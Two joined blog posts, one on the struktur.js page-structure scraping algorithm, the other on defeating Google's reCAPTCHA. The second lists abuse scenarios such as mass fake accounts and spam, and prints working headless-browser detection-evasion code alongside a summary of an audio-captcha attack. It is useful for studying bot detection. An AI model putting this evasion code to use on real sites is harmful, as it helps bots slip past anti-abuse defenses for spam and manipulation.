<h3>Algorithm Description</h3>
<p><strong>In a first step, we find potential structure candidates:</strong></p>
<p>Take a starting node as input. If no node is given, use the <code>body</code> element.</p>
<p>See if the element contains at least <em>N</em> identical elements (such as div, article, li, section, ...). If yes, mark those child nodes as potential structure candidates.</p>
<p>Visit the next node in the tree and check again for <em>N</em> identical elements.</p>
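<p>The candidate search described so far can be sketched in a few lines. Note that this is an illustration only and not the struktur.js implementation: it walks a small, well-formed markup string with Python's <code>xml.etree.ElementTree</code> instead of a live browser DOM, and the function name <code>find_candidates</code> is made up.</p>

```python
import xml.etree.ElementTree as ET
from collections import Counter


def find_candidates(root, n=6):
    """Return (container, tag, children) for nodes with >= n same-tag children."""
    candidates = []
    for node in root.iter():  # visits every node of the tree, root included
        counts = Counter(child.tag for child in node)
        for tag, count in counts.items():
            if count >= n:
                children = [child for child in node if child.tag == tag]
                candidates.append((node, tag, children))
    return candidates


# Tiny stand-in for a rendered page: a navigation bar and six result items.
PAGE = (
    "<body><nav><a/><a/></nav><div id='results'>"
    + "<article><a>title</a></article>" * 6
    + "</div></body>"
)

root = ET.fromstring(PAGE)
for container, tag, children in find_candidates(root):
    print(container.get("id"), tag, len(children))  # prints: results article 6
```

<p>The navigation bar is ignored because it only has two identical children, while the result container qualifies with six.</p>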
<p>After all candidates have been found, get the bounding boxes of the candidates with <code>getBoundingClientRect()</code>. If the bounding boxes align vertically and horizontally, have more or less identical dimensions, and make up a significant part of <code>document.body.getBoundingClientRect()</code>, add those elements to the potential structures. Further tests are possible.</p>
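<p>A rough sketch of such a bounding box test is shown below. It is a simplification under stated assumptions: rectangles are plain tuples instead of <code>DOMRect</code> objects, only a single column or a single row of items is recognized (no grids), and the thresholds <code>tolerance</code> and <code>min_coverage</code> are arbitrary values chosen for illustration.</p>

```python
from typing import NamedTuple


class Rect(NamedTuple):
    x: float
    y: float
    width: float
    height: float


def is_aligned_structure(rects, viewport, tolerance=0.1, min_coverage=0.2):
    """Check alignment, similar size and page coverage of candidate boxes."""
    if not rects:
        return False
    first = rects[0]

    def close(a, b, scale):
        return abs(a - b) <= tolerance * scale

    # A column shares the left edge, a row shares the top edge.
    same_left = all(close(r.x, first.x, viewport.width) for r in rects)
    same_top = all(close(r.y, first.y, viewport.height) for r in rects)
    similar_size = all(
        close(r.width, first.width, first.width)
        and close(r.height, first.height, first.height)
        for r in rects
    )
    covered = sum(r.width * r.height for r in rects)
    coverage = covered / (viewport.width * viewport.height)
    return (same_left or same_top) and similar_size and coverage >= min_coverage


page = Rect(0, 0, 1000, 2000)
column = [Rect(100, 100 + i * 150, 600, 140) for i in range(6)]
scattered = [Rect(10, 10, 50, 20), Rect(400, 900, 300, 200), Rect(700, 50, 90, 400)]
print(is_aligned_structure(column, page), is_aligned_structure(scattered, page))
```

<p>The six stacked boxes pass all three tests, whereas the scattered boxes already fail the alignment test.</p>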
<p><strong>In a second step, we cross correlate the contents of the structure candidates</strong> and filter out objects that are not similar enough: We compare the items within the potential structures. If they share common characteristics, we consider those elements to form a valid structure. We are only interested in <code>img</code>, <code>a</code> and <code>textNode</code>. Furthermore, we consider only visible nodes.</p>
<p>Example: If we find 8 results in a Google search, all those results essentially have a title (link with text), a visible link in green font (this is only green text and a child node of the title) and a snippet. The snippet typically consists of many different text nodes. Therefore one potential filter could be:</p>
<ol>
<li>Each object must have a link with text with font size <code>X</code> at the beginning of the object.</li>
<li>There must be a textNode with green font after this title.</li>
<li>There must be some text after this green colored text.</li>
</ol>
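<p>The three rules above could be expressed as a small predicate. This sketch assumes that every object has already been flattened into a list of its visible nodes in document order, each described by a dictionary with the hypothetical keys <code>type</code>, <code>text</code>, <code>font_size</code> and <code>color</code>.</p>

```python
def looks_like_search_result(nodes, title_font_size):
    """Apply the three filter rules to the visible nodes of one object."""
    if len(nodes) < 3:
        return False
    title, url, *rest = nodes
    # Rule 1: a link with text in the expected font size comes first.
    has_title = (
        title.get("type") == "a"
        and bool(title.get("text", "").strip())
        and title.get("font_size") == title_font_size
    )
    # Rule 2: a green text node follows the title.
    has_green_url = url.get("type") == "text" and url.get("color") == "green"
    # Rule 3: some further text follows the green text.
    has_snippet = any(
        n.get("type") == "text" and n.get("text", "").strip() for n in rest
    )
    return has_title and has_green_url and has_snippet


result = [
    {"type": "a", "text": "Europe news", "font_size": 20, "color": "blue"},
    {"type": "text", "text": "example.com/europe", "font_size": 14, "color": "green"},
    {"type": "text", "text": "Latest headlines from ...", "font_size": 14, "color": "black"},
]
advert = [{"type": "img", "text": "", "font_size": 0, "color": ""}]
print(looks_like_search_result(result, 20), looks_like_search_result(advert, 20))
```

<p>Objects that fail the predicate would simply be dropped from the candidate structure.</p>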
<h3>Downsides</h3>
<p>Because our algorithm is abstract, the JSON output cannot have meaningful variable names. The algorithm cannot know which text of the object is the title, which part is a price, what is a date, and so on. This means that a post-processing step after data extraction is necessary to assign variable names to the output.</p>
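<p>One way such a naming step might look is a handful of pattern-based heuristics. The following sketch is purely hypothetical and not part of struktur.js: the patterns, the field names and the function <code>label_fields</code> are assumptions chosen for illustration.</p>

```python
import re

# Hypothetical heuristics: the first matching pattern decides the field name.
PATTERNS = [
    ("link", re.compile(r"^https?://\S+$")),
    ("price", re.compile(r"^[$€£]\s?\d+(?:[.,]\d{2})?$")),
    ("date", re.compile(r"^\d{4}-\d{2}-\d{2}$")),
]


def label_fields(values):
    """Assign a guessed name to every extracted string of one object."""
    labeled = {}
    for index, value in enumerate(values):
        text = value.strip()
        name = next((n for n, p in PATTERNS if p.match(text)), "text")
        # Keep duplicates apart by appending the position in the object.
        key = name if name not in labeled else f"{name}_{index}"
        labeled[key] = text
    return labeled


print(label_fields(["Blue Widget", "$19.99", "https://example.com/w", "2019-07-15"]))
```

<p>Anything that matches no pattern stays a generic <code>text</code> field and still has to be named by hand.</p>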
<p>Furthermore, we cannot reliably know the correct <em>N</em> that specifies how many recurring elements should be in a structure. It depends on the website.</p>
<h2>Run struktur yourself</h2>
<p>Enough talking. You can test <strong>struktur.js</strong> in the following way: first download <a href="https://github.com/NikolaiT/struktur/blob/master/struktur.js"><strong>struktur.js</strong></a> and put it in the same directory as the following script:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// puppeteer-extra is a drop-in replacement for puppeteer,</span>
<span class="c1">// it augments the installed puppeteer with plugin functionality</span>
<span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">"puppeteer-extra"</span><span class="p">);</span>
<span class="c1">// add stealth plugin and use defaults (all evasion techniques)</span>
<span class="kd">const</span> <span class="nx">pluginStealth</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">"puppeteer-extra-plugin-stealth"</span><span class="p">);</span>
<span class="nx">puppeteer</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">pluginStealth</span><span class="p">());</span>
<span class="kd">const</span> <span class="nx">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">urls</span><span class="o">:</span> <span class="p">{</span>
<span class="s1">'google'</span><span class="o">:</span> <span class="s1">'https://www.google.de/search?q=europe+news'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">chrome_flags</span><span class="o">:</span> <span class="p">[</span>
<span class="s1">'--disable-infobars'</span><span class="p">,</span>
<span class="s1">'--window-position=0,0'</span><span class="p">,</span>
<span class="s1">'--ignore-certificate-errors'</span><span class="p">,</span>
<span class="s1">'--ignore-certificate-errors-spki-list'</span><span class="p">,</span>
<span class="s1">'--window-size=1920,1040'</span><span class="p">,</span>
<span class="s1">'--start-fullscreen'</span><span class="p">,</span>
<span class="s1">'--hide-scrollbars'</span><span class="p">,</span>
<span class="s1">'--disable-notifications'</span><span class="p">,</span>
<span class="p">],</span>
<span class="p">};</span>
<span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span> <span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span> <span class="nx">args</span><span class="o">:</span> <span class="nx">config</span><span class="p">.</span><span class="nx">chrome_flags</span> <span class="p">}).</span><span class="nx">then</span><span class="p">(</span><span class="k">async</span> <span class="nx">browser</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setBypassCSP</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setViewport</span><span class="p">({</span> <span class="nx">width</span><span class="o">:</span> <span class="mf">1920</span><span class="p">,</span> <span class="nx">height</span><span class="o">:</span> <span class="mf">1040</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">config</span><span class="p">.</span><span class="nx">urls</span><span class="p">.</span><span class="nx">google</span><span class="p">,</span> <span class="p">{</span><span class="nx">waitUntil</span><span class="o">:</span> <span class="s1">'networkidle0'</span><span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">1000</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">addScriptTag</span><span class="p">({</span><span class="nx">path</span><span class="o">:</span> <span class="s1">'struktur.js'</span><span class="p">});</span>
<span class="kd">var</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluate</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">struktur</span><span class="p">({</span>
<span class="nx">N</span><span class="o">:</span> <span class="mf">7</span><span class="p">,</span>
<span class="nx">highlightStruktur</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="nx">highlightContent</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="nx">addClass</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">1000</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">results</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">});</span>
</code></pre></div>
<p>Then install the dependencies with</p>
<div class="highlight"><pre><span></span><code>npm i puppeteer puppeteer-extra puppeteer-extra-plugin-stealth
</code></pre></div>
<p>Then run the above script with <code>node</code>. It prints the structure found on the Google search results page as JSON. You can specify any other website you want.</p>Breaking Google's Recaptcha2019-03-01T16:00:00+01:002019-03-01T16:00:00+01:00Nikolai Tschachertag:incolumitas.com,2019-03-01:/2019/03/01/breaking-googles-recaptcha/<p>A captcha is a mechanism to distinguish human users from automated programs (bots). There are many service providers on the Internet that have a major incentive to prevent bots from (ab)using their systems.</p>
<p>Imagine if there were a reliable method to break Google's famous <a href="https://developers.google.com/recaptcha/docs/versions">reCAPTCHA v2 or the new reCAPTCHA v3</a> (<a href="https://webmasters.googleblog.com/2018/10/introducing-recaptcha-v3-new-way-to.html">released</a> in late 2018). The following scenarios would be possible:</p>
<ol>
<li>
<p>Mass creation of accounts on sites such as <a href="https://www.reddit.com/">Reddit.com</a> in order to build <em>fake Internet personas</em>. After letting those bots post trivial but inconspicuous comments on random subreddits, you can slowly let them start to <strong>manipulate public opinion</strong> by downvoting, upvoting or posting political comments. This scenario is already reality and I don't actually want to know how strongly public opinion will be manipulated in the upcoming 2020 elections in the United States.</p>
</li>
<li>
<p>You could create fake Gmail accounts automatically. Of course, Gmail requires a valid phone number for each new account. Because phone numbers are a limited resource, this will be your bottleneck. Services such as <a href="http://smspva.com/">SMSPva</a> allow you to register virtual phone numbers from any country. Combined with an automated way to solve captchas, this allows you to create Gmail accounts en masse and proceed to spam with the highly trusted gmail.com MX domain.</p>
</li>
</ol>
<h3>Current State of Research</h3>
<p>A couple of papers in the past years investigated Google's anti-bot defenses. It is clear that the defenses are not solely based on solving a captcha puzzle. The system processes many signals of human behavior in order to make a final statement about the <em>humanness</em> of the interacting agent. Examples are:</p>
<ul>
<li>Can the program that sends the HTTP requests execute JavaScript?</li>
<li>Check that the user agent string is valid. Also check that the technical capabilities reported by the browser match what is advertised in the user agent string (very important!)</li>
<li>See if the browser has valid plugins, a valid screen resolution and a plausible time zone</li>
<li>Monitor the execution time of JavaScript</li>
<li>Number of mouse clicks and whether the mouse movement is organic or not</li>
<li>How much time passes between actions</li>
<li>Keyboard strokes or touch actions</li>
<li>A wide range of browser specific functions and CSS rules, canvas rendering properties</li>
<li>State is saved in a server side tracking cookie</li>
<li>Is the browser automated by browser automation software such as Selenium or <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a>? Many technical details leak that you are using browser automation software. <a href="https://github.com/paulirish/headless-cat-n-mouse">This GitHub repository</a> and <a href="https://intoli.com/blog/not-possible-to-block-chrome-headless/">this blog post</a> discuss them in detail.</li>
</ul>
<p>For example, we at <a href="https://scrapeulous.com/">scrapeulous.com</a> use the following code to prevent search engines from detecting that we are automating browsers:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// This is where we'll put the code to get around the tests.</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">evadeChromeHeadlessDetection</span><span class="p">(</span><span class="nx">page</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Pass the Webdriver Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">newProto</span> <span class="o">=</span> <span class="nx">navigator</span><span class="p">.</span><span class="nx">__proto__</span><span class="p">;</span>
<span class="ow">delete</span> <span class="nx">newProto</span><span class="p">.</span><span class="nx">webdriver</span><span class="p">;</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">__proto__</span> <span class="o">=</span> <span class="nx">newProto</span><span class="p">;</span>
<span class="p">});</span>
<span class="c1">// Pass the Chrome Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// We can mock this in as much depth as we need for the test.</span>
<span class="kd">const</span> <span class="nx">mockObj</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">app</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">isInstalled</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">webstore</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">onInstallStageChanged</span><span class="o">:</span> <span class="p">{},</span>
<span class="nx">onDownloadProgress</span><span class="o">:</span> <span class="p">{},</span>
<span class="p">},</span>
<span class="nx">runtime</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">PlatformOs</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">MAC</span><span class="o">:</span> <span class="s1">'mac'</span><span class="p">,</span>
<span class="nx">WIN</span><span class="o">:</span> <span class="s1">'win'</span><span class="p">,</span>
<span class="nx">ANDROID</span><span class="o">:</span> <span class="s1">'android'</span><span class="p">,</span>
<span class="nx">CROS</span><span class="o">:</span> <span class="s1">'cros'</span><span class="p">,</span>
<span class="nx">LINUX</span><span class="o">:</span> <span class="s1">'linux'</span><span class="p">,</span>
<span class="nx">OPENBSD</span><span class="o">:</span> <span class="s1">'openbsd'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">PlatformArch</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">ARM</span><span class="o">:</span> <span class="s1">'arm'</span><span class="p">,</span>
<span class="nx">X86_32</span><span class="o">:</span> <span class="s1">'x86-32'</span><span class="p">,</span>
<span class="nx">X86_64</span><span class="o">:</span> <span class="s1">'x86-64'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">PlatformNaclArch</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">ARM</span><span class="o">:</span> <span class="s1">'arm'</span><span class="p">,</span>
<span class="nx">X86_32</span><span class="o">:</span> <span class="s1">'x86-32'</span><span class="p">,</span>
<span class="nx">X86_64</span><span class="o">:</span> <span class="s1">'x86-64'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">RequestUpdateCheckStatus</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">THROTTLED</span><span class="o">:</span> <span class="s1">'throttled'</span><span class="p">,</span>
<span class="nx">NO_UPDATE</span><span class="o">:</span> <span class="s1">'no_update'</span><span class="p">,</span>
<span class="nx">UPDATE_AVAILABLE</span><span class="o">:</span> <span class="s1">'update_available'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">OnInstalledReason</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">INSTALL</span><span class="o">:</span> <span class="s1">'install'</span><span class="p">,</span>
<span class="nx">UPDATE</span><span class="o">:</span> <span class="s1">'update'</span><span class="p">,</span>
<span class="nx">CHROME_UPDATE</span><span class="o">:</span> <span class="s1">'chrome_update'</span><span class="p">,</span>
<span class="nx">SHARED_MODULE_UPDATE</span><span class="o">:</span> <span class="s1">'shared_module_update'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">OnRestartRequiredReason</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">APP_UPDATE</span><span class="o">:</span> <span class="s1">'app_update'</span><span class="p">,</span>
<span class="nx">OS_UPDATE</span><span class="o">:</span> <span class="s1">'os_update'</span><span class="p">,</span>
<span class="nx">PERIODIC</span><span class="o">:</span> <span class="s1">'periodic'</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">},</span>
<span class="p">};</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">chrome</span> <span class="o">=</span> <span class="nx">mockObj</span><span class="p">;</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">chrome</span> <span class="o">=</span> <span class="nx">mockObj</span><span class="p">;</span>
<span class="p">});</span>
<span class="c1">// Pass the Permissions Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">originalQuery</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">permissions</span><span class="p">.</span><span class="nx">query</span><span class="p">;</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">permissions</span><span class="p">.</span><span class="nx">__proto__</span><span class="p">.</span><span class="nx">query</span> <span class="o">=</span> <span class="nx">parameters</span> <span class="p">=></span>
<span class="nx">parameters</span><span class="p">.</span><span class="nx">name</span> <span class="o">===</span> <span class="s1">'notifications'</span>
<span class="o">?</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">resolve</span><span class="p">({</span><span class="nx">state</span><span class="o">:</span> <span class="nx">Notification</span><span class="p">.</span><span class="nx">permission</span><span class="p">})</span>
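<span class="o">:</span> <span class="nx">originalQuery</span><span class="p">.</span><span class="nx">call</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">permissions</span><span class="p">,</span> <span class="nx">parameters</span><span class="p">);</span>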
<span class="c1">// Inspired by: https://github.com/ikarienator/phantomjs_hide_and_seek/blob/master/5.spoofFunctionBind.js</span>
<span class="kd">const</span> <span class="nx">oldCall</span> <span class="o">=</span> <span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">call</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">call</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">oldCall</span><span class="p">.</span><span class="nx">apply</span><span class="p">(</span><span class="k">this</span><span class="p">,</span> <span class="nx">arguments</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">call</span> <span class="o">=</span> <span class="nx">call</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">nativeToStringFunctionString</span> <span class="o">=</span> <span class="ne">Error</span><span class="p">.</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/Error/g</span><span class="p">,</span> <span class="s2">"toString"</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">oldToString</span> <span class="o">=</span> <span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">toString</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">functionToString</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span> <span class="o">===</span> <span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">permissions</span><span class="p">.</span><span class="nx">query</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="s2">"function query() { [native code] }"</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span> <span class="o">===</span> <span class="nx">functionToString</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">nativeToStringFunctionString</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">oldCall</span><span class="p">.</span><span class="nx">call</span><span class="p">(</span><span class="nx">oldToString</span><span class="p">,</span> <span class="k">this</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">toString</span> <span class="o">=</span> <span class="nx">functionToString</span><span class="p">;</span>
<span class="p">});</span>
<span class="c1">// Pass the Plugins Length Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// Overwrite the `plugins` property to use a custom getter.</span>
<span class="nb">Object</span><span class="p">.</span><span class="nx">defineProperty</span><span class="p">(</span><span class="nx">navigator</span><span class="p">,</span> <span class="s1">'plugins'</span><span class="p">,</span> <span class="p">{</span>
<span class="c1">// This just needs to have `length > 0` for the current test,</span>
<span class="c1">// but we could mock the plugins too if necessary.</span>
<span class="nx">get</span><span class="o">:</span> <span class="p">()</span> <span class="p">=></span> <span class="p">[</span><span class="mf">1</span><span class="p">,</span> <span class="mf">2</span><span class="p">,</span> <span class="mf">3</span><span class="p">,</span> <span class="mf">4</span><span class="p">,</span> <span class="mf">5</span><span class="p">]</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="c1">// Pass the Languages Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// Overwrite the `languages` property to use a custom getter.</span>
<span class="nb">Object</span><span class="p">.</span><span class="nx">defineProperty</span><span class="p">(</span><span class="nx">navigator</span><span class="p">,</span> <span class="s1">'languages'</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">get</span><span class="o">:</span> <span class="p">()</span> <span class="p">=></span> <span class="p">[</span><span class="s1">'en-US'</span><span class="p">,</span> <span class="s1">'en'</span><span class="p">]</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="c1">// Pass the iframe Test</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nb">Object</span><span class="p">.</span><span class="nx">defineProperty</span><span class="p">(</span><span class="nx">HTMLIFrameElement</span><span class="p">.</span><span class="nx">prototype</span><span class="p">,</span> <span class="s1">'contentWindow'</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">get</span><span class="o">:</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">window</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="c1">// Pass toString test, though it breaks console.debug() from working</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">console</span><span class="p">.</span><span class="nx">debug</span> <span class="o">=</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">};</span>
<span class="p">});</span>
<span class="p">}</span>
</code></pre></div>
<p>The code above is directly suited for the browser automation library puppeteer. You can also pass certain configuration parameters to chromium in order to increase the speed of web scraping. For example in the search engine scraping library <a href="https://github.com/NikolaiT/se-scraper">se-scraper</a> we use the following flags to increase browsing speed:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// pass these via the `args` option of puppeteer.launch()</span>
<span class="kd">var</span> <span class="nx">ADDITIONAL_CHROME_FLAGS</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'--disable-infobars'</span><span class="p">,</span>
<span class="s1">'--window-position=0,0'</span><span class="p">,</span>
<span class="s1">'--ignore-certificate-errors'</span><span class="p">,</span>
<span class="s1">'--ignore-certificate-errors-spki-list'</span><span class="p">,</span>
<span class="s1">'--no-sandbox'</span><span class="p">,</span>
<span class="s1">'--disable-setuid-sandbox'</span><span class="p">,</span>
<span class="s1">'--disable-dev-shm-usage'</span><span class="p">,</span>
<span class="s1">'--disable-accelerated-2d-canvas'</span><span class="p">,</span>
<span class="s1">'--disable-gpu'</span><span class="p">,</span>
<span class="s1">'--window-size=1920,1080'</span><span class="p">,</span>
<span class="s1">'--hide-scrollbars'</span><span class="p">,</span>
<span class="p">];</span>
</code></pre></div>
<p>All this information is collected by Google's reCAPTCHA system. The longer a user appears human, the easier the captcha challenges become.</p>
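<p>One of the checks listed above, comparing the user agent string against the capabilities the browser actually reports, can be sketched as follows. This is only an illustration of the idea and not Google's actual logic. The function <code>findInconsistencies</code> and the shape of the <code>fingerprint</code> object are assumptions made for this example.</p>

```javascript
// Illustrative only: this is not Google's actual logic, just one plausible
// consistency check between a user agent string and reported properties.
// `fingerprint` is a hypothetical plain object collected in the browser.
function findInconsistencies(fingerprint) {
  const { userAgent, platform, hasChromeObject, webdriver, pluginCount } = fingerprint;
  const issues = [];

  const claimsWindows = /Windows NT/.test(userAgent);
  const claimsMac = /Mac OS X/.test(userAgent);
  const claimsChrome = /Chrome\//.test(userAgent) && !/Edge\//.test(userAgent);

  // navigator.platform should agree with the operating system in the user agent.
  if (claimsWindows && !/^Win/.test(platform)) issues.push('platform does not match Windows user agent');
  if (claimsMac && !/^Mac/.test(platform)) issues.push('platform does not match macOS user agent');
  // A browser claiming to be Chrome is expected to expose window.chrome.
  if (claimsChrome && !hasChromeObject) issues.push('window.chrome is missing');
  // navigator.webdriver is set by automation software.
  if (webdriver) issues.push('navigator.webdriver is set');
  // An empty plugin list is a typical headless signal.
  if (pluginCount === 0) issues.push('no plugins reported');

  return issues;
}

const headless = {
  userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
  platform: 'Linux x86_64',
  hasChromeObject: false,
  webdriver: true,
  pluginCount: 0,
};
console.log(findInconsistencies(headless));
```

<p>The evasion code shown earlier patches exactly these kinds of properties (<code>navigator.webdriver</code>, <code>window.chrome</code>, <code>navigator.plugins</code>), which is why a detector that relies on them alone can be bypassed.</p>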
<h3>Attacks on reCAPTCHA</h3>
<p>In early 2019, researchers from the University of Maryland published <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2</a>, a method to break Google's audio reCAPTCHA with up to <strong>90% accuracy</strong>.</p>
<p>In short, for reasons of accessibility, reCAPTCHA v2 offers two methods to solve a captcha:</p>
<ol>
<li>Solving some image related task such as finding a fucking fire hydrant</li>
<li>Listening to an audio challenge and typing in the words you hear</li>
</ol>
<p>It turns out that the public speech recognition APIs offered for free by services such as <strong>Google Speech-To-Text API (the irony)</strong> or <strong>Microsoft Bing Voice Recognition API</strong> are capable of solving the audio captcha with a success rate of up to 90%.</p>
<p>This means that those systems are broken by design.</p>
<h3>Future with reCAPTCHA v3</h3>
<p>I haven't used reCAPTCHA v3 myself, but Google completely shifts the center of focus away from direct user interaction to a more system-dependent approach.</p>
<p>reCAPTCHA v3 can be configured on all forms and inputs where people can interact with a web application. It then collects data in the background and feeds a machine learning application that learns how to distinguish spammers from legitimate users.</p>
<p>Developers can see which elements are interacted with, and in what way, in a Google administration panel and can then decide what behavior can be considered non-abusive.</p>
<p>Google returns a score between 0.0 and 1.0 for each action, where 1.0 means the interaction is very likely legitimate and 0.0 means it very likely originates from a bot. The developer then has the responsibility to decide how to act given a certain score.</p>
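<p>How a developer might act on such a score can be sketched as follows. The fields <code>success</code>, <code>score</code> and <code>action</code> are part of the JSON that the reCAPTCHA v3 verification endpoint returns, with a score of 1.0 indicating a very likely legitimate interaction. The function <code>decideAction</code>, the thresholds and the returned decision names are assumptions chosen for this example, not values recommended by Google.</p>

```javascript
// Sketch of a server-side decision based on a reCAPTCHA v3 verification result.
// `verification` is the parsed JSON response of the verification request.
// The thresholds and decision names are assumptions for illustration only.
function decideAction(verification, expectedAction, thresholds = { allow: 0.7, challenge: 0.3 }) {
  // The token was invalid, expired or already used.
  if (!verification.success) return 'reject';
  // The token was issued for a different action than the one being performed.
  if (verification.action !== expectedAction) return 'reject';
  // High score: very likely a legitimate user.
  if (verification.score >= thresholds.allow) return 'allow';
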